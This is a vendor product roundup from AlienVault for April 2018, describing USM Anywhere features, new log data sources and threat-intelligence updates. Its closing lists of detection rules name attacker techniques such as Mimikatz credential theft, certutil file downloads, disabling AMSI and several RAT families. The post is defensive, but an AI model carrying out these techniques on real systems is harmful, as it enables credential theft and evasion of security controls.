AlienVault Monthly Product Roundup April 2018

We are continuously making improvements and rolling out new features to USM Anywhere to help your team to be more effective at detecting and responding to threats. You can keep up with USM Anywhere releases by reading our release notes in the AlienVault Product Forum. Here is a roundup of the highlights from our April 2018 releases:

Go Threat Hunting with OTX Endpoint Threat Hunter™:

Okay, so technically this one is not a USM Anywhere feature, but it is very cool (and free!) and worth the mention here. Earlier this month, we launched OTX Endpoint Threat Hunter™— a new free service in Open Threat Exchange® (OTX™) that allows anyone to hunt for malware and other threats on their endpoints using the indicators of compromise (IOCs) catalogued in OTX. It’s powerful, easy to use, and completely free.

Introducing our not-so-secret Agent, man:

OTX Endpoint Threat Hunter is powered by the AlienVault Agent—a lightweight and adaptable endpoint agent based on osquery. We plan to extend the use of the AlienVault Agent in USM Anywhere and have already begun to invite USM Anywhere users to request early access to the AlienVault Agent through the product, under the new Agents page. Participation in early access is limited.

The AlienVault Agent provides deep visibility into your environment with File Integrity Monitoring and event forwarding on Windows and Linux endpoints. It is simple and fast to install and has a small footprint. With the AlienVault Agent, you can get to endpoint security insights quickly, without the cost and complexity of a standalone endpoint security solution. We’ll announce general availability later this year, so stay tuned!

Leveling up our sensor security:

In an effort to constantly improve our security hygiene (we already floss daily), this month, we added secure transport capabilities to USM Anywhere sensors. USM Anywhere now supports syslog over TCP (port 601) and secure transport through TLS (port 6514), so you can rest easier at night.

Show me the data sources:

When it comes to data collection for threat detection, the first and most important thing to know is whether your data sources are supported and how. To make it easier and faster to navigate data collection in USM Anywhere, we added a new Data Sources menu to the main navigation. This menu consolidates all the different ways USM Anywhere collects data from your environment: Sensors, Agents, and Integrations. The new Integrations page includes tabs for Plugins, Sensor Apps, and LevelBlueApps, which now includes the Forensics and Response App. In addition, we streamlined the existing Settings menu, again making USM Anywhere simple and fast to use.

New and improved data sources:

Speaking of data sources, we regularly add support for new data sources and improve our methods of collection, parsing, and normalization for existing data sources. You can always find our full list of data sources, including LevelBlueApps and plugins, here.

If you don’t see a data source here that you want to support, fear not. AlienVault will build support for most commercially available products at no additional charge. 

This month, we added or updated the following data sources in USM Anywhere:

New Data Sources:

• IBM QRadar Network Security
• Infoblox
• Fortinet FortiAnalyzer
• HPE StoreOnce
• Microsoft Exchange 2013
• STEALTHbits Activity Monitor
• Kerio
• Silverpeak WAN Opti
• AWS API Gateway

Improvements to Existing Data Sources:

• AlienVault NIDS: added new highlight fields
• Windows: added fields for port and application
• Windows: added support to use new file hash fields
• Microsoft: added support to collect Microsoft SQL logs using NXLog
• Office 365 Exchange: added fields for ClientIPAddress, ClientInfoString
• Amazon: updated to correctly parse Amazon Linux logs
• AWS Cloudtrail: added capture access_key_id
• FortiClient: fixed log processing issue
• Sysmon-Nxlog: fixed source_process_id parsing issue
• Duo: fixed incorrect destination designation
• Netscaler: fixed missing event names
• OpenVPN: fixed name parsing issue
• Cisco ASA: fixed missing access_control_outcome

Threat Intelligence delivered faster than your Amazon Prime order

Last, but never least, the LevelBlue Labs Security Research Team delivers continuous threat intelligence updates to USM Anywhere every single day. This automated, actionable (re: no effort required on your part) threat intelligence keeps your USM Anywhere deployment humming against emerging and evolving threats as they unfold in the wild.

In addition to all the data sources listed above, the LevelBlue Labs Security Research Team delivered the following threat intelligence to the USM Anywhere platform this month:

New Correlation Rules

• New correlation rule to detect PowerLessShell
• New correlation rule to detect common Powershell attack frameworks
• New correlation rule to detect Java process spawning
• New correlation rule to detect known Mimikatz module in process argument
• New correlation rule to detect certutil downloading files
• New correlation rule to detect attackers/users disabling AMSI
• New default Cisco Umbrella correlation rules

Updated Correlation Rules

• Updated 'Client Side Exploit  – Known Vulnerability' correlation rule to detect Oracle WebLogic CVE-2018-2628
• Updated the 'Malware Infection – Mobile Trojan' correlation rule to detect RedDrop activity
• Updated the ‘Malware Infection – Remote Access Trojan’ correlation rule to detect Gh0st, njRAT, Remcos/Remvio, and Xtrat families
• Added and updated 'Malware Infection – Trojan' correlation rules to detect malicious activity from Adderall, MSIL, Win32, Hawkeye, RubberDucky, RadRAT, Marcher.w Banker, SLocker.PN, Panda Banker, and Triada.dm families.

And, that’s the condensed version! For more info about our threat intelligence updates, including threat analysis, subscribe to the weekly threat intelligence newsletter from the LevelBlue Labs Security Research Team.